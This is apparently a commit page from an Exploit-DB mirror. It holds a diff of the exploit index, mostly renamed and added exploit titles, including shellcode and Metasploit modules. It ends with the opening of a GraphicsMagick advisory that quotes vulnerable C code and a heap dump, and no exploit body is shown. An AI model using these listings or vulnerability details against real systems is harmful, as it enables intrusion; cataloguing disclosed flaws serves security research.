bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-11-04

Browse source 
4 new exploits

Avira Premium Security Suite - NtCreateKey Race Condition
Avira Premium Security Suite - 'NtCreateKey' Race Condition

Microsoft Internet Explorer - Memory Corruption

Lotus Domino SMTP Router & Email Server and Client - Denial of Service

Byte Fusion BFTelnet 1.1 - Long 'Username' Denial of Service
Byte Fusion BFTelnet 1.1 - Long Username Denial of Service

Apple Mac OSX (Mavericks) - IOBluetoothHCIUserClient Privilege Escalation
Apple Mac OSX (Mavericks) - 'IOBluetoothHCIUserClient' Privilege Escalation
Python 2.7 hotshot Module - pack_string Heap Buffer Overflow
Python 2.7 array.fromstring Method - Use-After-Free
Python 2.7 hotshot Module - 'pack_string' Heap Buffer Overflow
Python 2.7 - 'array.fromstring' Method Use-After-Free

GraphicsMagick - Memory Disclosure / Heap Overflow

Mozilla Firefox 3.6 - URL Spoofing

Vir.IT eXplorer Anti-Virus - Privilege Escalation
Vir.IT eXplorer Anti-Virus 8.5.39 - 'VIAGLT64.SYS' Privilege Escalation

Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass Exploit

Adobe Flash / Reader - Live Malware (PoC)

Adobe ColdFusion - Directory Traversal

Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit

CA BrightStor ARCserve License Service - GCR NETWORK Buffer Overflow (Metasploit)
CA BrightStor ARCserve License Service - 'GCR NETWORK' Buffer Overflow (Metasploit)
Nullsoft SHOUTcast 1.9.2 - icy-name/icy-url Memory Corruption (1)
Nullsoft SHOUTcast 1.9.2 - icy-name/icy-url Memory Corruption (2)
Nullsoft SHOUTcast 1.9.2 - 'icy-name/icy-url' Memory Corruption (1)
Nullsoft SHOUTcast 1.9.2 - 'icy-name/icy-url' Memory Corruption (2)

Move Media Player 1.0 Quantum Streaming - ActiveX Control Multiple Buffer Overflow Vulnerabilities

tnftp - 'savefile' Arbitrary Command Execution (Metasploit)

PostNuke 0.763 - PNSV lang Remote Code Execution
PostNuke 0.763 - 'PNSV lang' Remote Code Execution

GuppY 4.6.3 - 'includes.inc selskin' Remote File Inclusion
GuppY 4.6.3 - 'index.php?selskin' Remote File Inclusion
WordPress Plugin JTRT Responsive Tables 4.1 - SQL Injection
Ladon Framework for Python 0.9.40 - XML External Entity Expansion
This commit is contained in:
Offensive Security 2017-11-04 05:01:30 +00:00
parent 8194245b20
commit ffa5f29b53
5 changed files with 645 additions and 19 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

42
files.csv
View file

@ -1779,10 +1779,10 @@ id,file,description,date,author,platform,type,port
15384,platforms/windows/dos/15384.c,"AVG Internet Security 9.0.851 - Local Denial of Service",2010-11-02,"Nikita Tarakanov",windows,dos,0
15394,platforms/windows/dos/15394.txt,"Maxthon 3.0.18.1000 - CSS Denial of Service",2010-11-02,4n0nym0us,windows,dos,0
15393,platforms/windows/dos/15393.pl,"Quickzip 5.1.8.1 - Denial of Service",2010-11-02,moigai,windows,dos,0
15407,platforms/windows/dos/15407.txt,"Avira Premium Security Suite - NtCreateKey Race Condition",2010-11-03,"Nikita Tarakanov",windows,dos,0
15407,platforms/windows/dos/15407.txt,"Avira Premium Security Suite - 'NtCreateKey' Race Condition",2010-11-03,"Nikita Tarakanov",windows,dos,0
15408,platforms/windows/dos/15408.html,"Crystal Report Viewer 8.0.0.371 - ActiveX Denial of Service",2010-11-03,"Matthew Bergin",windows,dos,0
15411,platforms/windows/dos/15411.pl,"HtaEdit 3.2.3.0 - '.hta' Buffer Overflow",2010-11-04,anT!-Tr0J4n,windows,dos,0
15418,platforms/windows/dos/15418.html,"Microsoft Internet Explorer - Memory Corruption",2010-11-04,Unknown,windows,dos,0
15418,platforms/windows/dos/15418.html,"Microsoft Internet Explorer - Memory Corruption",2010-11-04,anonymous,windows,dos,0
15419,platforms/windows/dos/15419.txt,"Acrobat Reader 9.4 - Memory Corruption",2010-11-04,scup,windows,dos,0
15420,platforms/windows/dos/15420.c,"Avast! Internet Security - aswtdi.sys Local Denial of Service (PoC)",2010-11-04,"Nikita Tarakanov",windows,dos,0
15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 - GET Denial of Service",2010-11-05,wingthor,windows,dos,0
@ -1991,7 +1991,7 @@ id,file,description,date,author,platform,type,port
17501,platforms/hardware/dos/17501.py,"D-Link DSL-2650U - Denial of Service (PoC)",2011-07-07,"Li'el Fridman",hardware,dos,0
17512,platforms/windows/dos/17512.pl,"ZipItFast 3.0 - '.zip' Heap Overflow",2011-07-08,"C4SS!0 G0M3S",windows,dos,0
17544,platforms/windows/dos/17544.txt,"GDI+ - 'gdiplus.dll' CreateDashedPath Integer Overflow",2011-07-18,Abysssec,windows,dos,0
17549,platforms/multiple/dos/17549.txt,"Lotus Domino SMTP Router & Email Server and Client - Denial of Service",2011-07-19,Unknown,multiple,dos,0
17549,platforms/multiple/dos/17549.txt,"Lotus Domino SMTP Router & Email Server and Client - Denial of Service",2011-07-19,anonymous,multiple,dos,0
17567,platforms/osx/dos/17567.txt,"Apple Safari 5.0.6/5.1 - SVG DOM Processing (PoC)",2011-07-25,"Nikita Tarakanov",osx,dos,0
17569,platforms/windows/dos/17569.py,"Ciscokits 1.0 - TFTP Server File Name Denial of Service",2011-07-25,"Craig Freyman",windows,dos,0
17580,platforms/windows/dos/17580.py,"MyWebServer 1.0.3 - Denial of Service",2011-07-28,X-h4ck,windows,dos,0
@ -2321,7 +2321,7 @@ id,file,description,date,author,platform,type,port
19577,platforms/windows/dos/19577.py,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - 'Services.exe' Denial of Service (1)",1999-10-31,nas,windows,dos,0
19578,platforms/windows/dos/19578.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - 'Services.exe' Denial of Service (2)",1999-10-31,.rain.forest.puppy,windows,dos,0
19675,platforms/linux/dos/19675.c,"Linux Kernel 2.0.x (Debian 2.1 / RedHat 5.2) - Packet Length with Options",1999-12-08,"Andrea Arcangeli",linux,dos,0
19596,platforms/windows/dos/19596.txt,"Byte Fusion BFTelnet 1.1 - Long 'Username' Denial of Service",1999-11-03,"Ussr Labs",windows,dos,0
19596,platforms/windows/dos/19596.txt,"Byte Fusion BFTelnet 1.1 - Long Username Denial of Service",1999-11-03,"Ussr Labs",windows,dos,0
19605,platforms/linux/dos/19605.c,"Linux Kernel 3.2.24 - 'fs/eventpoll.c' Local Denial of Service",2012-07-05,"Yurij M. Plotnikov",linux,dos,0
19615,platforms/unix/dos/19615.c,"ISC BIND 8.2.2 / IRIX 6.5.17 / Solaris 7.0 - NXT Overflow / Denial of Service",1999-11-10,"ADM Crew",unix,dos,0
19616,platforms/windows/dos/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service / Buffer Overflow",1999-11-08,Interrupt,windows,dos,0
@ -4392,7 +4392,7 @@ id,file,description,date,author,platform,type,port
35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0
35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 - UPnP HTTP Request Remote Denial of Service",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0
35105,platforms/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow / Denial of Service EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos,0
35153,platforms/osx/dos/35153.c,"Apple Mac OSX (Mavericks) - IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari & joystick",osx,dos,0
35153,platforms/osx/dos/35153.c,"Apple Mac OSX (Mavericks) - 'IOBluetoothHCIUserClient' Privilege Escalation",2014-11-03,"rpaleari & joystick",osx,dos,0
35154,platforms/asp/dos/35154.txt,"Sigma Portal - 'ShowObjectPicture.aspx' Denial of Service",2010-12-27,"Pouya Daneshmand",asp,dos,0
35158,platforms/windows/dos/35158.py,"Mongoose 2.11 - 'Content-Length' HTTP Header Remote Denial of Service",2010-12-27,JohnLeitch,windows,dos,0
35162,platforms/linux/dos/35162.cob,"GIMP 2.6.7 - Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0
@ -4809,8 +4809,8 @@ id,file,description,date,author,platform,type,port
38612,platforms/android/dos/38612.txt,"Samsung Galaxy S6 - libQjpeg DoIntegralUpsample Crash",2015-11-03,"Google Security Research",android,dos,0
38613,platforms/android/dos/38613.txt,"Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash",2015-11-03,"Google Security Research",android,dos,0
38614,platforms/android/dos/38614.txt,"Samsung - libQjpeg Image Decoding Memory Corruption",2015-11-03,"Google Security Research",android,dos,0
38615,platforms/windows/dos/38615.txt,"Python 2.7 hotshot Module - pack_string Heap Buffer Overflow",2015-11-03,"John Leitch",windows,dos,0
38616,platforms/multiple/dos/38616.txt,"Python 2.7 array.fromstring Method - Use-After-Free",2015-11-03,"John Leitch",multiple,dos,0
38615,platforms/windows/dos/38615.txt,"Python 2.7 hotshot Module - 'pack_string' Heap Buffer Overflow",2015-11-03,"John Leitch",windows,dos,0
38616,platforms/multiple/dos/38616.txt,"Python 2.7 - 'array.fromstring' Method Use-After-Free",2015-11-03,"John Leitch",multiple,dos,0
38617,platforms/windows/dos/38617.txt,"Python 2.7 - 'strop.replace()' Method Integer Overflow",2015-11-03,"John Leitch",windows,dos,0
38618,platforms/windows/dos/38618.txt,"Python 3.3 < 3.5 - 'product_setstate()' Out-of-Bounds Read",2015-11-03,"John Leitch",windows,dos,0
38620,platforms/linux/dos/38620.txt,"FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",linux,dos,0
@ -5724,6 +5724,7 @@ id,file,description,date,author,platform,type,port
43026,platforms/windows/dos/43026.py,"ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service",2017-10-21,"Berk Cem Göksel",windows,dos,0
43058,platforms/windows/dos/43058.c,"Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference",2017-10-26,"Parvez Anwar",windows,dos,0
43060,platforms/windows/dos/43060.py,"Tizen Studio 1.3 Smart Development Bridge < 2.3.2 - Buffer Overflow (PoC)",2017-10-27,"Marcin Kopec",windows,dos,0
43111,platforms/multiple/dos/43111.py,"GraphicsMagick - Memory Disclosure / Heap Overflow",2017-11-03,SecuriTeam,multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -6757,7 +6758,7 @@ id,file,description,date,author,platform,type,port
11465,platforms/windows/local/11465.py,"Ollydbg 2.00 Beta1 - Local Buffer Overflow",2010-02-15,_SuBz3r0_,windows,local,0
11475,platforms/windows/local/11475.txt,"OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow",2010-02-16,mr_me,windows,local,0
11491,platforms/multiple/local/11491.rb,"Apple iTunes 9.0.1 - '.pls' Handling Buffer Overflow",2010-02-17,"S2 Crew",multiple,local,0
11561,platforms/multiple/local/11561.html,"Mozilla Firefox 3.6 - URL Spoofing",2010-02-24,Unknown,multiple,local,0
11561,platforms/multiple/local/11561.html,"Mozilla Firefox 3.6 - URL Spoofing",2010-02-24,anonymous,multiple,local,0
11573,platforms/windows/local/11573.c,"Mediacoder 0.7.3.4605 - Local Buffer Overflow",2010-02-24,"fl0 fl0w",windows,local,0
11581,platforms/windows/local/11581.py,"Orbital Viewer 1.04 - '.orb' File Local Universal Overflow (SEH)",2010-02-26,mr_me,windows,local,0
11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - '.m3u' / '.pls' / '.ypl' Buffer Overflow (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0
@ -9313,7 +9314,7 @@ id,file,description,date,author,platform,type,port
43056,platforms/php/local/43056.py,"PHPMailer < 5.2.21 - Local File Disclosure",2017-10-25,"Maciek Krupa",php,local,0
43057,platforms/windows/local/43057.txt,"HitmanPro 3.7.15 Build 281 - Kernel Pool Overflow",2017-10-26,cbayet,windows,local,0
43104,platforms/windows/local/43104.py,"Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Buffer Overflow (SEH)",2017-10-05,"Venkat Rajgor",windows,local,0
43109,platforms/windows/local/43109.c,"Vir.IT eXplorer Anti-Virus - Privilege Escalation",2017-11-01,"Parvez Anwar",windows,local,0
43109,platforms/windows/local/43109.c,"Vir.IT eXplorer Anti-Virus 8.5.39 - 'VIAGLT64.SYS' Privilege Escalation",2017-11-01,"Parvez Anwar",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -9433,7 +9434,7 @@ id,file,description,date,author,platform,type,port
227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) - 'lpd' Format String",2000-12-11,DiGiT,linux,remote,515
228,platforms/bsd/remote/228.c,"Oops! 1.4.6 - one russi4n proxy-server Heap Buffer Overflow",2000-12-15,diman,bsd,remote,3128
230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Command Execution",2000-12-15,VeNoMouS,linux,remote,515
232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass Exploit",2000-12-19,Unknown,windows,remote,0
232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass Exploit",2000-12-19,anonymous,windows,remote,0
234,platforms/bsd/remote/234.c,"OpenBSD ftpd 2.6/2.7 - Remote Exploit",2000-12-20,Scrippie,bsd,remote,21
237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - TCP/IP Weakness Spoof IP Exploit",2001-01-02,Stealth,linux,remote,513
239,platforms/solaris/remote/239.c,"WU-FTPD 2.6.0 - Remote Format Strings Exploit",2001-01-03,kalou,solaris,remote,21
@ -10835,7 +10836,7 @@ id,file,description,date,author,platform,type,port
12865,platforms/hardware/remote/12865.txt,"Motorola Surfboard Cable Modem - Directory Traversal",2010-06-03,"S2 Crew",hardware,remote,0
40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80
13735,platforms/osx/remote/13735.py,"Apple Mac OSX EvoCam Web Server 3.6.6/3.6.7 - Buffer Overflow",2010-06-05,d1dn0t,osx,remote,8080
13787,platforms/multiple/remote/13787.txt,"Adobe Flash / Reader - Live Malware (PoC)",2010-06-09,Unknown,multiple,remote,0
13787,platforms/multiple/remote/13787.txt,"Adobe Flash / Reader - Live Malware (PoC)",2010-06-09,anonymous,multiple,remote,0
13808,platforms/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly (MS03-044)",2010-06-10,"Tavis Ormandy",windows,remote,0
13818,platforms/windows/remote/13818.txt,"Nginx 0.8.36 - Source Disclosure / Denial of Service",2010-06-11,Dr_IDE,windows,remote,0
13822,platforms/windows/remote/13822.txt,"Nginx 0.7.65/0.8.39 (dev) - Source Disclosure / Download",2010-06-11,"Jose A. Vazquez",windows,remote,0
@ -10899,7 +10900,7 @@ id,file,description,date,author,platform,type,port
14604,platforms/windows/remote/14604.py,"Easy FTP 1.7.0.11 - 'NLST' / 'NLST -al' / 'APPE' / 'RETR' / 'SIZE' / 'XCWD' Buffer Overflow",2010-08-10,"Rabih Mohsen",windows,remote,0
14623,platforms/windows/remote/14623.py,"EasyFTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflows",2010-08-11,"Glafkos Charalambous",windows,remote,21
14658,platforms/windows/remote/14658.txt,"123 FlashChat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,windows,remote,0
14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal",2010-08-14,Unknown,multiple,remote,0
14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal",2010-08-14,anonymous,multiple,remote,0
14674,platforms/windows/remote/14674.txt,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0
14779,platforms/windows/remote/14779.pl,"Deepin TFTP Server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote,0
14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - 'newclass' Invalid Pointer Exploit",2010-09-01,Abysssec,windows,remote,0
@ -10944,7 +10945,7 @@ id,file,description,date,author,platform,type,port
15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA Server 1.06 - Buffer Overflow",2010-10-27,blake,windows,remote,0
15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - 'soap_action_name' POST UPnP 'sscanf' Buffer Overflow",2010-10-28,n00b,windows,remote,0
15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0
15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit",2010-10-29,Unknown,windows,remote,0
15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit",2010-10-29,anonymous,windows,remote,0
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 - 'RETR'/'DELE'/'RMD' Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0
15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
@ -11150,7 +11151,7 @@ id,file,description,date,author,platform,type,port
16411,platforms/windows/remote/16411.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (3)",2010-11-03,Metasploit,windows,remote,0
16412,platforms/windows/remote/16412.rb,"CA BrightStor ARCserve Message Engine 0x72 - Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
16413,platforms/windows/remote/16413.rb,"CA BrightStor ArcServe - Media Service Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
16414,platforms/windows/remote/16414.rb,"CA BrightStor ARCserve License Service - GCR NETWORK Buffer Overflow (Metasploit)",2010-11-03,Metasploit,windows,remote,0
16414,platforms/windows/remote/16414.rb,"CA BrightStor ARCserve License Service - 'GCR NETWORK' Buffer Overflow (Metasploit)",2010-11-03,Metasploit,windows,remote,0
16415,platforms/windows/remote/16415.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - 'rxsSetDataGrowthScheduleAndFilter' Buffer Overflow (Metasploit)",2011-03-10,Metasploit,windows,remote,0
16416,platforms/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflows (Metasploit)",2010-11-04,Metasploit,windows,remote,0
16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
@ -13317,8 +13318,8 @@ id,file,description,date,author,platform,type,port
23320,platforms/multiple/remote/23320.txt,"MLdonkey 2.5-4 - Cross-Site Scripting",2003-10-31,"Chris Sharp",multiple,remote,0
23321,platforms/windows/remote/23321.txt,"Microsoft Internet Explorer 6 < 10 - Mouse Tracking",2012-12-12,"Nick Johnson",windows,remote,0
23323,platforms/windows/remote/23323.py,"Novell File Reporter (NFR) Agent - XML Parsing Remote Code Execution",2012-12-12,Abysssec,windows,remote,0
23328,platforms/windows/remote/23328.py,"Nullsoft SHOUTcast 1.9.2 - icy-name/icy-url Memory Corruption (1)",2003-11-03,airsupply,windows,remote,0
23329,platforms/windows/remote/23329.c,"Nullsoft SHOUTcast 1.9.2 - icy-name/icy-url Memory Corruption (2)",2003-11-03,exworm,windows,remote,0
23328,platforms/windows/remote/23328.py,"Nullsoft SHOUTcast 1.9.2 - 'icy-name/icy-url' Memory Corruption (1)",2003-11-03,airsupply,windows,remote,0
23329,platforms/windows/remote/23329.c,"Nullsoft SHOUTcast 1.9.2 - 'icy-name/icy-url' Memory Corruption (2)",2003-11-03,exworm,windows,remote,0
23334,platforms/windows/remote/23334.pl,"IA WebMail Server 3.0/3.1 - GET Buffer Overrun",2003-11-03,"Peter Winter-Smith",windows,remote,0
23340,platforms/windows/remote/23340.txt,"Microsoft Internet Explorer 6 - Double Slash Cache Zone Bypass",2003-10-05,"Liu Die Yu",windows,remote,0
23385,platforms/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service - Cross-Site Scripting",2003-11-17,"Ziv Kamir",multiple,remote,0
@ -14353,7 +14354,7 @@ id,file,description,date,author,platform,type,port
31024,platforms/hardware/remote/31024.txt,"F5 BIG-IP 9.4.3 - 'SearchString' Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,nnposter,hardware,remote,0
30882,platforms/hardware/remote/30882.txt,"Thomson SpeedTouch 716 - 'URL' Cross-Site Scripting",2007-11-10,"Remco Verhoef",hardware,remote,0
30883,platforms/windows/remote/30883.js,"BitDefender AntiVirus 2008 - 'bdelev.dll' ActiveX Control Double-Free",2007-11-11,"Lionel d'Hauenens",windows,remote,0
30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,Unknown,windows,remote,0
30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,anonymous,windows,remote,0
30565,platforms/windows/remote/30565.pl,"AkkyWareHOUSE '7-zip32.dll' 4.42 - Heap Based Buffer Overflow",2007-09-04,miyy3t,windows,remote,0
30567,platforms/windows/remote/30567.html,"Microsoft Agent - 'agentdpv.dll' ActiveX Control Malformed URL Stack Buffer Overflow",2007-09-11,"Yamata Li",windows,remote,0
30569,platforms/windows/remote/30569.py,"Unreal Commander 0.92 - Directory Traversal",2007-09-06,"Gynvael Coldwind",windows,remote,0
@ -15935,6 +15936,7 @@ id,file,description,date,author,platform,type,port
43059,platforms/windows/remote/43059.py,"DameWare Remote Controller < 12.0.0.520 - Remote Code Execution",2016-04-03,Securifera,windows,remote,0
43061,platforms/hardware/remote/43061.txt,"MitraStar DSL-100HN-T1/GPT-2541GNAC - Privilege Escalation",2017-10-28,j0lama,hardware,remote,0
43105,platforms/hardware/remote/43105.txt,"ZyXEL PK5001Z Modem - Backdoor Account",2017-10-31,"Matthew Sheimo",hardware,remote,0
43112,platforms/unix/remote/43112.rb,"tnftp - 'savefile' Arbitrary Command Execution (Metasploit)",2017-11-03,Metasploit,unix,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -17675,7 +17677,7 @@ id,file,description,date,author,platform,type,port
2703,platforms/php/webapps/2703.txt,"Article System 0.6 - 'volume.php' Remote File Inclusion",2006-11-02,GregStar,php,webapps,0
2704,platforms/php/webapps/2704.txt,"FreeWebShop.org script 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0
2706,platforms/php/webapps/2706.txt,"MODx CMS 0.9.2.1 - 'FCKeditor' Remote File Inclusion",2006-11-03,nuffsaid,php,webapps,0
2707,platforms/php/webapps/2707.php,"PostNuke 0.763 - PNSV lang Remote Code Execution",2006-11-03,Kacper,php,webapps,0
2707,platforms/php/webapps/2707.php,"PostNuke 0.763 - 'PNSV lang' Remote Code Execution",2006-11-03,Kacper,php,webapps,0
2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager - 'admin' Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0
2710,platforms/php/webapps/2710.txt,"Ariadne 2.4 - store_config[code] Remote File Inclusion",2006-11-04,"Mehmet Ince",php,webapps,0
2711,platforms/php/webapps/2711.php,"e107 < 0.75 - 'e107language_e107cookie' Local File Inclusion",2006-11-04,Kacper,php,webapps,0
@ -18836,7 +18838,7 @@ id,file,description,date,author,platform,type,port
4596,platforms/php/webapps/4596.txt,"Scribe 0.2 - PHP Remote Code Execution",2007-11-02,KiNgOfThEwOrLd,php,webapps,0
4597,platforms/php/webapps/4597.txt,"DM Guestbook 0.4.1 - Multiple Local File Inclusions",2007-11-02,GoLd_M,php,webapps,0
4599,platforms/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - 'index.php?module' Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0
4602,platforms/php/webapps/4602.txt,"GuppY 4.6.3 - 'includes.inc selskin' Remote File Inclusion",2007-11-03,irk4z,php,webapps,0
4602,platforms/php/webapps/4602.txt,"GuppY 4.6.3 - 'index.php?selskin' Remote File Inclusion",2007-11-03,irk4z,php,webapps,0
4603,platforms/php/webapps/4603.txt,"Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion",2007-11-03,GoLd_M,php,webapps,0
4604,platforms/php/webapps/4604.txt,"scWiki 1.0 Beta 2 - 'common.php?pathdot' Remote File Inclusion",2007-11-03,GoLd_M,php,webapps,0
4605,platforms/php/webapps/4605.txt,"Vortex Portal 1.0.42 - Remote File Inclusion",2007-11-04,ShAy6oOoN,php,webapps,0
@ -38803,3 +38805,5 @@ id,file,description,date,author,platform,type,port
43103,platforms/xml/webapps/43103.py,"Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure",2017-10-30,mr_me,xml,webapps,0
43106,platforms/php/webapps/43106.txt,"OctoberCMS 1.0.426 (Build 426) - Cross-Site Request Forgery",2017-11-01,"Zain Sabahat",php,webapps,0
43108,platforms/php/webapps/43108.txt,"Ingenious School Management System 2.3.0 - 'friend_index' SQL injection",2017-11-01,"Giulio Comi",php,webapps,0
43110,platforms/php/webapps/43110.txt,"WordPress Plugin JTRT Responsive Tables 4.1 - SQL Injection",2017-11-03,"Lenon Leite",php,webapps,0
43113,platforms/xml/webapps/43113.txt,"Ladon Framework for Python 0.9.40 - XML External Entity Expansion",2017-11-03,"RedTeam Pentesting",xml,webapps,0

Can't render this file because it is too large.

255
platforms/multiple/dos/43111.py Executable file
View file

@ -0,0 +1,255 @@
'''Vulnerabilities summary
The following advisory describes two (2) vulnerabilities found in GraphicsMagick.
GraphicsMagick is The swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheelers SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.
The vulnerabilities found are:
Memory Information Disclosure
Heap Overflow
Credit
An independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
Vendor response
The vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18).
For more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt
Vulnerabilities details
Memory Information Disclosure
GraphicsMagick is vulnerable to a memory information disclosure vulnerability found in DescribeImage function of the magick/describe.c file.
The portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image.
This vulnerability can be triggered with a specially crafted MIFF file.
The code which triggers the vulnerable code path is:
63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file,
64 const MagickBool verbose)
65 {
...
660 for (i=0; i < profile_length; )
661 {
662 if (profile[i] != 0x1c)
663 {
664 i++;
665 continue;
666 }
667 i++; /* skip file separator */
668 i++; /* skip record number */
...
725 i++;
726 (void) fprintf(file," %.1024s:\n",tag);
727 length=profile[i++] << 8;
728 length|=profile[i++];
729 text=MagickAllocateMemory(char *,length+1);
730 if (text != (char *) NULL)
731 {
732 char
733 **textlist;
734
735 register unsigned long
736 j;
737
738 (void) strncpy(text,(char *) profile+i,length);
739 text[length]='\0';
740 textlist=StringToList(text);
741 if (textlist != (char **) NULL)
742 {
743 for (j=0; textlist[j] != (char *) NULL; j++)
744 {
745 (void) fprintf(file," %s\n",textlist[j]);
...
752 i+=length;
753 }
The value in profile_length variable is set in the following field in the MIFF header: profile-iptc=8
There is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i is never checked.
If we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation.
gef x/2xg profile
0x8be210: 0x08000a001c414141 0x00007ffff690fba8
